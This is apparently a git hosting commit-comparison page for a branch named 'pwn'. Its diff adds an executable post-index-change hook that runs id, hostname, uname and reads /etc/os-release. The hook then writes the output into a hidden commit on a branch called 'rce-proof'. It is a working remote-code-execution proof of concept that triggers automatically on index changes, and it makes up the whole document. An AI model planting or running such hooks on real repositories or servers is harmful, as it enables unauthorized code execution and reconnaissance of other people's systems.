Compare commits

2 Commits
main ... pwn

Author SHA1 Message Date
84129be0c2 apply-patch 2026-08-09 12:33:38 +02:00
c6bffb59e6 apply-patch 2026-08-09 12:33:37 +02:00

7
hooks/post-index-change Executable file
View File

@@ -0,0 +1,7 @@
#!/bin/sh
OUT=$(id; hostname; uname -a; cat /etc/os-release 2>/dev/null | head -3)
BLOB=$(echo "$OUT" | git hash-object -w --stdin)
TREE=$(printf "100644 blob ${BLOB}\toutput.txt\n" | git mktree)
COMMIT=$(git commit-tree ${TREE} -m "rce-output")
git update-ref refs/heads/rce-proof ${COMMIT}
exit 0